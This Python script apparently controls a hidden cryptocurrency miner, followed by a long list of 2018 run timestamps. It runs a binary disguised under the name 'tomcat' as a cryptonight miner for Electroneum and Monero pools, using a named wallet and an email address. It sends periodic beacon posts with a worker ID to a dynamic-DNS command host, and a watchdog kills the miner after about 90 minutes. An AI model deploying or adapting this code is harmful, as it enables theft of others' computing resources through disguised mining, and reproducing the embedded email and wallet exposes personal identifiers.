import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:07:05.885253
#2018-02-17 15:41:05.143381
#2018-02-17 17:17:05.843471
#2018-02-17 18:52:01.553500
#2018-02-17 20:24:06.384143
#2018-02-17 21:56:06.166317
#2018-02-17 23:26:06.242771
#2018-02-18 01:03:01.310911
#2018-02-18 02:38:05.334930
#2018-02-18 04:11:04.064121
#2018-02-18 05:43:07.008489
#2018-02-18 07:21:06.176872
#2018-02-18 08:50:05.308443
#2018-02-18 10:21:06.712041
#2018-02-18 11:54:06.413730
#2018-02-18 13:26:05.201513
#2018-02-18 15:03:01.335278
#2018-02-18 16:35:07.857927
#2018-02-18 18:10:06.636282
#2018-02-18 19:40:09.060878
#2018-02-18 21:11:07.194497
#2018-02-18 22:45:07.451412
#2018-02-19 00:21:01.436313
#2018-02-19 01:52:04.631156
#2018-02-19 03:26:07.314099
#2018-02-19 04:56:07.470115
#2018-02-19 06:29:05.682380
#2018-02-19 08:07:04.092076
#2018-02-19 09:42:01.517233
#2018-02-19 11:14:04.106604
#2018-02-19 12:46:08.890943
#2018-02-19 14:21:11.595232
#2018-02-19 15:55:10.782310
#2018-02-19 17:26:10.861274
#2018-02-19 18:59:04.334909
#2018-02-19 20:39:06.959487
#2018-02-19 22:16:04.367606
#2018-02-19 23:47:01.994560
#2018-02-20 01:22:06.582184
#2018-02-20 02:58:06.316221
#2018-02-20 04:31:07.617834
#2018-02-20 05:57:08.119440
#2018-02-20 07:33:07.539070
#2018-02-20 09:06:07.677205
#2018-02-20 10:37:03.833772
#2018-02-20 12:11:05.129229
#2018-02-20 13:47:09.049198
#2018-02-20 15:18:02.928038
#2018-02-20 16:52:04.077789
#2018-02-20 18:28:01.544524
#2018-02-20 20:06:07.697108
#2018-02-20 21:38:01.883916
#2018-02-20 23:09:06.579510
#2018-02-21 00:44:10.525740
#2018-02-21 02:19:01.970489
#2018-02-21 03:54:07.845713
#2018-02-21 05:28:01.704262
#2018-02-21 07:02:06.257084
#2018-02-21 08:33:06.067082
#2018-02-21 10:07:06.747908
#2018-02-21 11:43:07.521123
#2018-02-21 13:17:09.007294
#2018-02-21 14:49:08.109259
#2018-02-21 16:24:07.962900
#2018-02-21 18:02:09.285669
#2018-02-21 19:31:02.062900
#2018-02-21 21:05:10.095632
#2018-02-21 22:38:02.105205
#2018-02-22 00:15:06.521814
#2018-02-22 01:48:05.733204
#2018-02-22 03:21:06.787728
#2018-02-22 04:53:05.714146
#2018-02-22 06:26:04.713874
#2018-02-22 07:59:08.632802
#2018-02-22 09:36:08.452898
#2018-02-22 11:06:07.769593
#2018-02-22 12:39:13.527154
#2018-02-22 14:11:06.131758
#2018-02-22 15:46:09.614213
#2018-02-22 17:20:11.613291
#2018-02-22 18:54:10.319947
#2018-02-22 20:33:09.812411
#2018-02-22 22:02:01.702718
#2018-02-22 23:34:04.945260
#2018-02-23 01:10:01.324208
#2018-02-23 02:42:07.706502
#2018-02-23 04:18:03.862559
#2018-02-23 05:51:06.295062
#2018-02-23 07:27:04.143238
#2018-02-23 09:19:07.651758
#2018-02-23 11:08:07.969039
#2018-02-23 12:32:07.528334
#2018-02-23 14:00:01.493118
#2018-02-23 15:35:09.774289
#2018-02-23 17:08:01.706913
#2018-02-23 18:38:02.098477
#2018-02-23 20:20:04.246269
#2018-02-23 21:53:07.070023
#2018-02-23 23:27:07.796327
#2018-02-24 01:07:05.632784
#2018-02-24 02:47:07.058857
#2018-02-24 04:21:03.683698
#2018-02-24 06:08:05.602824
#2018-02-24 08:48:03.587624
#2018-02-24 10:50:07.456981
#2018-02-24 12:38:03.706725
#2018-02-24 14:27:01.400274
#2018-02-24 16:15:07.265217
#2018-02-24 18:08:05.722370
#2018-02-24 19:53:05.507994
#2018-02-24 21:37:06.131466
#2018-02-25 00:26:06.860508
#2018-02-25 04:04:04.674344
#2018-02-25 07:36:03.930939